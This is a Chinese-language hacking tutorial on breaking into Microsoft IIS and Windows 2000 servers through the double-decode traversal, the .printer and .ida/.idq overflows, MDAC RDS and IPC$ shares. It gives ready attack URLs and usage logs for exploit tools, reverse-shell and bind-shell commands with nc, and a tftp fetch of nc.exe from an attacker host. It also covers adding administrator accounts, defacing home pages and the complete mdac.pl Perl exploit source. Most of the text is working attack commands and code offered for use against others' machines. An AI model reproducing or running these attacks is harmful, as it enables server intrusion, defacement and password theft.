关与这个漏洞,我也不想多说什么。网上有成吨的文章介绍它。本站也收录了《unicode编码漏洞全攻略》(1-8)如果你全读完了,对这个漏洞的利用基本是没什么问题了。5月份,中美网络大战,国内的一些所谓的红客,就是利用这个漏洞,改了大量的美国主页。也是之所以一些人认为哪次攻击技术含量不高的原因。
最早是由NSFOCUS安全小组的袁哥发现微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在 一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时, 如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊 的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
————IIS CGI文件名二次解码漏洞———
其实,这个漏洞类似与unicode。利用这个漏洞,我们可以象利用unocode漏洞一样运行远程主机的dos命令,攻击方法基本相同。
绿盟www. nsfocus.com2001年5月15日在绿盟月刊第21期公布了Microsoft IIS CGI文件名错误解码漏 洞。 该漏洞是由于iIIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进 行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为”.exe”或”.com”等等。在文件名 检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地 将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。
通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对”../”
或”./”的检查,在某些条件下,攻击者可以执行任意系统命令。
例如,对于\’\\’这个字符,正常编码后是%5c。这三个字符对应的编码为:
\’%\’ = %25
\’5\’ = %35
\’c\’ = %63
如果要对这三个字符再做一次编码,就可以有多种形式,例如:
%255c
%%35c
%%35%63
%25%35%63
…
因此,”..\”就可以表示成”..%255c”或”..%%35c”等等形式。
可以看出,该漏洞与unicode漏洞在运用上有着相似之处。
如果目标主机存在一个虚拟可执行目录(scripts),并且它与
windows系统在同一驱动器上。那么在浏览器提交请求:
http://目标主机ip/scripts/..%25%35%63..%25%35%63cwinnt/system32/cmd.exe?/c+dir+c:\
可以列出远程主机的c盘根目录:
根据绿盟的公告,该漏洞编码形式还有:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c
(应该还有更多)
网上有专门的扫描器。至于漏洞利用的详细利用,可以参考《unicode编码漏洞全攻略》(1-8)。
————–IIS 5.0 .printer远程缓冲区溢出漏洞(ISAPI)—————-
微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其”Host:”域包含大约420字节的数
据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。
这个漏洞非常危险,因为它仅仅需要WIN2000打开80端口(http)或者443端
口(https),微软公司强烈要求在未打补丁之前一定要移除ISAPI网络打印的映射。
ISAPI (Internet Services Application Programming Interface)因特网服务
应用编程界面是一种能够使网络开发商通过编写能为网络服务器提供新的服务的
自定义命令码来扩展网络服务器功能的一种技术。
该自定义命令码既能在ISAPI过滤器中完成(当新的功能所提供一种较低水平的服
务时);也能在ISAPI扩展项中完成(当新的功能提供一种较高水平服务时)。现在,
被溢出的代码就是这ISAPI扩展。
由于,这个漏洞存在与web服务端口,所以,对开设http或https服务功能的主机来说,连放火墙也不能阻止利用这个功能。
另外,该漏洞不影响iis 4.0的服务器。
相应的攻击程序有3种(至少我知道这三)。
1、小榕的IIS5Exploit
严格地说,这软件并不是小榕写的,这软件是小榕根据jill.c改编优化部分代
码编译出来的。不过这软件确实很好,特别推荐大家使用。
下载地址http://www.netxeyes.com/IIS5Exploit.zip
压缩包里含有三个文件IIS5Exploit.exe、nc.exe、readme.txt
IIS5 .Printer Exploit 使用说明
—————–以下是readme.txt的内容
本程序适用于英文版IIS 5.0
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\>jill xxx.xxx.xxx.xxx 211.152.188.1 333
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001. http://www.netXeyes.com===
Connecting 211.152.188.1 …OK.
Send Shell Code …OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻,如果成功在本机NC监听的端口出现:
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如:
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
这样就创建了一个属于Administrator组的用户Hack,密码为password.
—————————————————————–
使用说明解释:
使用这软件实际上要开两个MS-DOS窗口,首先运行nc -l -p 99 当然也可以
把端口定义为其他的。然后,打入: IIS5Exploit 目标主机的IP 自己的IP 99(要与自己NC开的端口一致)
为了攻击的成功率高,首先必须要明确所攻击的目标主机一定是开有
http\https服务的win2k。
也可以用eyas提供的ScanPrinter来扫描获得。
2、isno提供的cniis、iisx
isno最新的.printer漏洞攻击软件是iisx,是CNIIS的升级版本,按找作者的
使用说明我们可以看到:
使用方法: iisx <目标主机> <sp> <-p|-a|-r attackhost attackport>
sp: 0 — 目标没有安装SP , 1 — 目标安装了SP1
提供三种对IIS5 .printer漏洞的攻击方式:
-p — 对攻击目标运行iisx 66.77.88.99 0 -p
在66.77.88.99上开一个端口7788,可以直接telnet 66.77.88.99 7788
-a — 对攻击目标运行iisx 66.77.88.99 0 -a
在66.77.88.99上添加一个管理员帐号:hax,其密码也为hax,
可以使用net use \\66.77.88.99\ipc$ “hax” /user:”hax”建立连接。
-r — 反向连接(类似于jill的方式),具体实施方法如下:
例如先在一台机器111.222.333.444上运行nc -vv -l -p 5432,
然后对攻击目标运行iisx 66.77.88.99 0 -r 111.222.33.444 5432,
这时在111.222.333.444就会出现来自66.77.88.99的连接。
3、sunx.org提供的iis5hack
运行参数
iis5hack <目标主机IP> <WEB端口80> <主机类型>
中文WIN2K: 0
中文WIN2K sp1: 1
英文WIN2K: 2
英文WIN2K, sp1: 3
日文WIN2K: 4
日文WIN2K, sp1: 5
E:\HACK\print>iis5hack 63.110.130.66 80 3
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting…
sending…
Now you can telnet to 99 port
good luck 🙂
c:\telnet 63.110.130.66 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
已经进入目标主机,你想干什么就是你的事啦。该软件的优点是针对多种语
言版本的WIN2K系统,缺点,溢出成功后目标主机的IIS停止服务,并且得到
SHELL后要在较短时间内完成你想做的事,时间长的话连SHELL、IIS都会死
掉;不能随意定义目标主机的SHELL端口。在退出TELNET服务时也一定要记住
正常exit退出,否则目标主机的IIS也会死。
———————————
这里说到iis5hack,又让我想起了另外一个软件……
———–IIS HACK————-
说起来惭愧,我最早是在一份电脑杂志上也有看到他的介绍。
www.eeye.com的人员发现了一个IIS4.0的缓冲溢出可以允许用户上载
程序,如netcat到目标服务器,并把cmd.exe绑定到80口。这个缓冲溢
出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求
没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序
在系统中下载和执行程序。
你需要一台自己的WEB服务器, 当然你可以是虚拟服务器哦。如:放到自己的主页空间或肉鸡上也可以啦!
你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应
的目录下,然后使用iishack.exe来检查目标机器:
c:\>iishack.exe <victim> 80 <your webserver>/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:\>nc <victim> 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。
—————-IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞—————
微软IIS缺省安装情况下带了一个索引服务器(Index Server,在Windows 2000下名为”Index Service”).缺省安装时,IIS支持两种脚本映射:管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 – idq.dll来处理和解释。
由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区,如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据,攻击者可以改变程序执行流程,执行任意代码。
成功地利用这个漏洞,攻击者可以远程获取”Local System”权限。
(写到这里的时候,窗外爆竹声骤起,零点的钟声敲响了。在这里谨以此文祝贺火丁又大了一岁!现在是马年了。好困……睡了。)
xfocus的isno公布了一段改良后的攻击代码,如果有兴趣可以找原代码读一下,这里就不做介绍了。我们还是来看看怎么攻击^_^。
有两个程序,ISMiscOverflowV1_Build0010.exe和IISIDQOverflowV1_Build0010.exe
是snake做的,可以到http://snake12.top263.net他的个人主页下载。下载运行前者出现了程序的主界面.
看看实战吧~~~ 首先找到有.idq漏洞的机器,流光可以扫描到.很多的.随便来一个.
在被攻击IP地址后面写上对方的IP.端口号一般不需要改动. 左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~ 软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~ 点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.
都说nc比telnet强大.用nc吧~
c:\windows>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\windows>
看来没成功. 再来一次了!
换用IIS5 English Win2k Sp1再试!
c:\windows>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
OK!!!~~~你不用在向用unicode那样害怕权限不够了.你现在可是system权限.
接下来就是IISIDQOverflowV1_Build0010.exe了!为了方便,可以把他改名比如idq.exe
在DOS状态下(假设idq.exe在c:\下)
c:\idq.exe
运行参数: 操作系统类型 目的地址 web端口 溢出端口
支持的操作系统 类型: —-
0 — IIS5中文Win2k Sp0
1 — IIS5中文Win2k Sp1
2 — IIS5中文Win2k Sp2
3 — IIS5 English Win2k Sp0
4 — IIS5 English Win2k Sp1
5 — –not support — IIS5 English Win2k Sp2
6 — IIS5 Japanese Win2k Sp0
7 — IIS5 Japanese Win2k Sp1
8 — –not support — IIS5 Japanese Win2k Sp2
IIS5 IDQ Overflow. by snake. (http://snake12.top263.net) 2000/07
c:\>idq 3 XXX.XXX.XXX.XXX80 456
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 456了,good luck.!
c:\>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
没成功.试试sp1.
c:\>idq 4 XXX.XXX.XXX.XXX 80 888
连接目的机器 XXX.XXX.XXX.XXX:80 OK.
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK
现在,你可以 连接 该主机的 端口 888了,good luck.!
c:\>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
呵呵!OK!现在你想干什么啊!
————–MDAC- 本地命令执行(msadcs.dll )—————-
这个漏洞是比较老了,可网络如此之大,可能还有好多IIS WEB服务
器存在这个漏洞啦。IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行
你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,
它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,
其一般默认情况下是SYSTEM用户。关于这个漏洞的描述,很多文章介绍
的很清楚,这里不做详细解释,你如果要对自己的站点进行检查是否存在
这个漏洞,你可以通过下面的操作:
c:\>nc -nw -w 2 <victim> 80
GET /msadc/msadcs.dll HTTP
如果你得到下面的信息:
application/x_varg
就很有可能没有打上补丁并存在此漏洞,你可以使用这两个程序进行测试 mdac.pl和msadc2.pl 。
c:\> mdac.pl -h<victim>
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
OK,如果你要替换对方的主页,你就可以使用下面的方法:
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
或者其他命令,当然最好的方法我觉得还是使用上载我们的netcat,并
把CMD.EXE绑定到端口80上,我们可以设置我们自己的TFTP服务程序并把
nc.exe放上去,然后在执行命令,如:
cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
然后你就连接到80口,得到一个SHELL口让你浏览。呵呵!如果,对方开5631或3389
你还可以抓*.cif或sam的密码文档下来,跑密码。
下面提供mdac.pl的perl代码。
#!perl
#
# MSADC/RDS \’usage\’ (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!
use Socket; use Getopt::Std;
getopts(“e:vd:h:XR”, \%args);
print “– RDS exploit by rain forest puppy / ADM / Wiretrip –\n”;
if (!defined $args{h}&& !defined $args{R}){
print qq~
Usage: msadc.pl -h<host>{ -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5
Or a -R will resume a command session
~; exit;}
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=””;
if (defined $args{v}){ $verbose=1; }else{$verbose=0;}
if (defined $args{d}){$delay=$args{d};}else{$delay=1;}
if(!defined $args{R}){ $ip.=”.” if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die(“inet_aton problems; host doesn\’t exist?”);}
if (defined $args{X}&& !defined $args{R}){ &hork_idx; exit; }
if (!defined $args{R}){ $ret = &has_msadc;
die(“Looks like msadcs.dll doesn\’t exist\n”)if $ret==0}
print “Please type the NT commandline you want to run (cmd /c assumed):\n”
. “cmd /c “;
$in=<STDIN>; chomp $in;
$command=”cmd /c ” . $in ;
if (defined $args{R}){&load; exit;}
print “\nStep 1: Trying raw driver to btcustmr.mdb\n”;
&try_btcustmr;
print “\nStep 2: Trying to make our own DSN…”;
&make_dsn ?print “<<success>>\n” : print”<<fail>>\n”;
print “\nStep 3: Trying known DSNs…”;
&known_dsn;
print “\nStep 4: Trying known .mdbs…”;
&known_mdb;
if (defined $args{e}){
print “\nStep 5: Trying dictionary of DSN names…”;
&dsn_dict; }else{ “\nNo -e; Step 5 skipped.\n\n”; }
print “Sorry Charley…maybe next time?\n”;
exit;
##############################################################################
sub sendraw{ # ripped and modded from whisker
sleep($delay); # it\’s a DoS on the server! At least on mine…
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(\’tcp\’)||0) ||
die(“Socket problems\n”);
if(connect(S,pack “SnA4x8”,2,80,$target)){
select(S); $|=1;
print $pstr; my@in=<S>;
select(STDOUT); close(S);
return @in;
}else{ die(“Can\’t connect…\n”); }}
##############################################################################
sub make_header{ # make the HTTP request
my $msadc=<<EOT
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3
–!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
; $msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req{ # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=””; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query=”Select * from Customers where City=” . make_shell();
$dsn=”driver={Microsoft Access Driver (*.mdb)};dbq=” .
$p1 . “:\\” . $p2 . “\\help\\iis\\htm\\tutorial\\btcustmr.mdb;”;}
elsif ($switch==2){ # this is general make table query
$query=”create table AZZ (B int, C varchar(10))”;
$dsn=”$p1″;}
elsif ($switch==3){ # this is general exploit table query
$query=”select * from AZZ where C=” . make_shell();
$dsn=”$p1″;}
elsif ($switch==4){ # attempt to hork file info from index server
$query=”select path from scope()”;
$dsn=”Provider=MSIDXS;”;}
elsif ($switch==5){ # bad query
$query=”select”;
$dsn=”$p1″;}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
$req = “\x02\x00\x03\x00”;
$req.= “\x08\x00” . pack (“S1”, length($t1));
$req.= “\x00\x00” . $t1 ;
$req.= “\x08\x00” . pack (“S1”, length($t2));
$req.= “\x00\x00” . $t2 ;
$req.=”\r\n–!ADM!ROX!YOUR!WORLD!–\r\n”;
return $req;}
##############################################################################
sub make_shell{ # this makes the shell() statement
return “\’|shell(\”$command\”)|\'”;}
##############################################################################
sub make_unicode{ # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++){ $out.=substr($in,$c,1) . “\x00”; }
return $out;}
##############################################################################
sub rdo_success{ # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn{ # this makes a DSN for us
my @drives=(“c”,”d”,”e”,”f”);
print “\nMaking DSN: “;
foreach $drive (@drives){
print “$drive: “;
my @results=sendraw(“GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B” .
“Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq=”
. $drive . “\%3A\%5Csys.mdb\&newdb= CREATE_DB\&attr= HTTP/1.0\n\n”);
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq “404”; # not found/doesn\’t exist
if($2 eq “200”){
foreach $line (@results){
return 1 if$line= ~/<H2>Datasource creationsuccessful<\/H2>/;}}
}return 0;}
##############################################################################
sub verify_exists{
my ($page)=@_;
my @results=sendraw(“GET $page HTTP/1.0\n\n”);
return $results[0];}
##############################################################################
sub try_btcustmr{
my @drives=(“c”,”d”,”e”,”f”);
my @dirs=(“winnt”,”winnt35″,”winnt351″,”win”,”windows”);
foreach $dir (@dirs){
print “$dir -> “; # fun status so you can see progress
foreach $drive (@drives){
print “$drive: “; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) – 28;
$reqlenlen=length( “$reqlen” );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print “Success!\n”;save(1,1,$drive,$dir);exit;}
else{ verbose(odbc_error(@results)); funky(@results);}}print “\n”;}}
##############################################################################
sub odbc_error{
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\\’\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\\’\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\\’\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print “\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n”;
print “$in : ” . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose{
my ($in)=@_;
return if !$verbose;
print STDOUT “\n$in\n”;}
##############################################################################
sub save{
my ($p1, $p2, $p3, $p4)=@_;
open(OUT,”>rds.save”) || print “Problem saving parameters…\n”;
print OUT “$ip\n$p1\n$p2\n$p3\n$p4\n”;
close OUT;}
##############################################################################
sub load{
my @p; my$drvst=”driver={Microsoft Access Driver (*.mdb)}; dbq=”;
open(IN,”<rds.save”) || die(“Couldn\’t open rds.save\n”);
@p=<IN>; close(IN);
$ip=”$p[0]”; $ip=~s/\n//g; $ip.=”.” if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die(“inet_aton problems”);
print “Resuming to $ip …”;
$p[3]=”$p[3]”; $p[3]=~s/\n//g; $p[4]=”$p[4]”; $p[4]=~s/\n//g;
if($p[1]==1){
$reqlen=length( make_req(1,”$p[3]”,”$p[4]”) ) – 28;
$reqlenlen=length( “$reqlen” ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,”$p[3]”,”$p[4]”));
if (rdo_success(@results)){print “Success!\n”;}
else{ print “failed\n”; verbose(odbc_error(@results));}}
elsif ($p[1]==3){
if(run_query(“$p[3]”)){
print “Success!\n”;}else{ print “failed\n”; }}
elsif ($p[1]==4){
if(run_query($drvst . “$p[3]”)){
print “Success!\n”; }else{ print “failed\n”; }}
exit;}
##############################################################################
sub create_table{
my ($in)=@_;
$reqlen=length( make_req(2,$in,””) ) – 28;
$reqlenlen=length( “$reqlen” );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,””));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table \’AZZ\’ already exists/;
return 0;}
##############################################################################
sub known_dsn{
# we want \’wicca\’ first, because if step 2 made the DSN, it\’s ready to go
my @dsns=(“wicca”, “AdvWorks”, “pubs”, “CertSvr”, “CFApplications”,
“cfexamples”, “CFForums”, “CFRealm”, “cfsnippets”, “UAM”,
“banner”, “banners”, “ads”, “ADCDemo”, “ADCTest”);
foreach $dSn (@dsns){
print “.”;
next if (!is_access(“DSN=$dSn”));
if(create_table(“DSN=$dSn”)){
print “$dSn successful\n”;
if(run_query(“DSN=$dSn”)){
print “Success!\n”; save (3,3,”DSN=$dSn”,””); exit; }else{
print “Something\’s borked. Use verbose next time\n”;}}}print “\n”;}
##############################################################################
sub is_access{
my ($in)=@_;
$reqlen=length( make_req(5,$in,””) ) – 28;
$reqlenlen=length( “$reqlen” );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,””));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query{
my ($in)=@_;
$reqlen=length( make_req(3,$in,””) ) – 28;
$reqlenlen=length( “$reqlen” );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,””));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb{
my @drives=(“c”,”d”,”e”,”f”,”g”);
my @dirs=(“winnt”,”winnt35″,”winnt351″,”win”,”windows”);
my $dir, $drive, $mdb;
my$drv=”driver={Microsoft Access Driver (*.mdb)}; dbq=”;
# this is sparse, because I don\’t know of many
my @sysmdbs=( “\\catroot\\icatalog.mdb”,
“\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb”,
“\\system32\\certmdb.mdb”,
“\\system32\\certlog\\certsrv.mdb” ); #these are %systemroot%
my @mdbs=( “\\cfusion\\cfapps\\cfappman\\data\\applications.mdb”,
“\\cfusion\\cfapps\\forums\\forums_.mdb”,
“\\cfusion\\cfapps\\forums\\data\\forums.mdb”,
“\\cfusion\\cfapps\\security\\realm_.mdb”,
“\\cfusion\\cfapps\\security\\data\\realm.mdb”,
“\\cfusion\\database\\cfexamples.mdb”,
“\\cfusion\\database\\cfsnippets.mdb”,
“\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb”,
“\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb”,
“\\cfusion\\brighttiger\\database\\cleam.mdb”,
“\\cfusion\\database\\smpolicy.mdb”,
“\\cfusion\\database\cypress.mdb”,
“\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb”,
“\\website\\cgi-win\\dbsample.mdb”,
“\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb”,
“\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb”
); #these are just
foreach $drive (@drives){
foreach $dir (@dirs){
foreach $mdb (@sysmdbs){
print “.”;
if(create_table($drv . $drive . “:\\” . $dir . $mdb)){
print “\n” . $drive . “:\\” . $dir . $mdb . ” successful\n”;
if(run_query($drv . $drive . “:\\” . $dir . $mdb)){
print “Success!\n”; save (4,4,$drive . “:\\” . $dir . $mdb,””); exit;
}else{ print “Something\’s borked. Use verbose next time\n”; }}}}}
foreach $drive (@drives){
foreach $mdb (@mdbs){
print “.”;
if(create_table($drv . $drive . $dir . $mdb)){
print “\n” . $drive . $dir . $mdb . ” successful\n”;
if(run_query($drv . $drive . $dir . $mdb)){
print “Success!\n”; save (4,4,$drive . $dir . $mdb,””); exit;
}else{ print “Something\’s borked. Use verbose next time\n”; }}}}
}
##############################################################################
sub hork_idx{
print “\nAttempting to dump Index Server tables…\n”;
print ” NOTE: Sometimes this takes a while, other times it stalls\n\n”;
$reqlen=length( make_req(4,””,””) ) – 28;
$reqlenlen=length( “$reqlen” );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,””,””));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{“$1$2″}=””;}
foreach $c (keys %d){ print “$c\n”; }
}else{print “Index server doesn\’t seem to be installed.\n”; }}
##############################################################################
sub dsn_dict{
open(IN, “<$args{e}”) || die(“Can\’t open external dictionary\n”);
while(<IN> ){
$hold=$_; $hold=~s/[\r\n]//g; $dSn=”$hold”; print “.”;
next if (!is_access(“DSN=$dSn”));
if(create_table(“DSN=$dSn”)){
print “$dSn successful\n”;
if(run_query(“DSN=$dSn”)){
print “Success!\n”; save (3,3,”DSN=$dSn”,””); exit; }else{
print “Something\’s borked. Use verbose next time\n”;}}}
print “\n”; close(IN);}
##############################################################################
sub sendraw2{ # ripped and modded from whisker
sleep($delay); # it\’s a DoS on the server! At least on mine…
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(\’tcp\’)||0) ||
die(“Socket problems\n”);
if(connect(S,pack “SnA4x8”,2,80,$target)){
print “Connected. Getting data”;
open(OUT,”>raw.out”); my @in;
select(S); $|=1; print $pstr;
while(<S> ){ print OUT $_; push @in, $_; print STDOUT “.”;}
close(OUT); select(STDOUT); close(S); return @in;
}else{ die(“Can\’t connect…\n”); }}
##############################################################################
sub content_start{ # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++){
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/){ $c++; }
else{ return $c+1; }}}
return -1;}# it should never get here actually
##############################################################################
sub funky{
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print “\nServer returned an ADO miscofiguration message\nAborting.\n”;
exit;}
if($error=~/A Handler is required/){
print “\nServer has custom handler filters (they most likely are patched)\n”;
exit;}
if($error=~/specified Handler has denied Access/){
print “\nServer has custom handler filters (they most likely are patched)\n”;
exit;}}
##############################################################################
sub has_msadc{
my @results=sendraw(“GET /msadc/msadcs.dll HTTP/1.0\n\n”);
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application\/x-varg/);
return 0;}
————-IPC入侵————–
IPC是Internet Process Connection的缩写,也就是远程网络连接。它本来是UNIX的进程间通讯的意思,这里我们说的是Windows下的IPC,他主要是共享命名管道的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。
它是Windows NT及Windows 2000特有的一项功能,特点是在同一时间内,两个IP之间只允许建立一个连接。好了,废话少说,现在进入主题。
如何找到具有IPC漏洞的主机呢?用小榕的流光2000,找到这样的主机实在是太简单了,具体操作我就不说了,大家可以参考该软件的说明文档。
好了,假设我们已经找到了一台这样的主机,地址是139.223.200.xxx,管理员帐号是Administrator,密码是123456。进入命令行方式,正式开工。需要说明的是,以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。
F:\>net use \\139.223.200.xxx\ipc$ “123456” /user:”Administrator”
命令成功完成。
F:\>copy nc.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\>net time \\139.223.200.xxx
\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地时间 (GMT – 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业,其作业 ID = 0
F:\>telnet 139.223.200.xxx 1234
上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schedule服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。
F:\>netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx
